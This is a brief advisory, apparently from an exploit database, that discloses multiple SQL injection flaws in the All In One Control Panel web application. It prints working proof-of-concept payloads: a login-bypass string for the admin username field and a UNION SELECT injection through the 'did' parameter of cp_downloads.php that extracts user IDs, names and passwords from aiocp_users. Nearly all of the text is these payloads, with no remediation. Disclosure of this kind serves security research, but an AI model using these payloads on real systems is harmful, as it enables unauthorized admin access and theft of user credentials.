|
All In One Control Panel Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a web client. The following proof-of-concept examples are available: In: http://www.example.com/AIOCP/admin/code/index.php Username: ' OR user_id = '2' UNION SELECT * FROM aiocp_users WHERE user_name=' Password: *any password* http://www.example.com/AIOCP/public/code/cp_downloads.php?did=[sql] http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous |
|
|
Privacy Statement |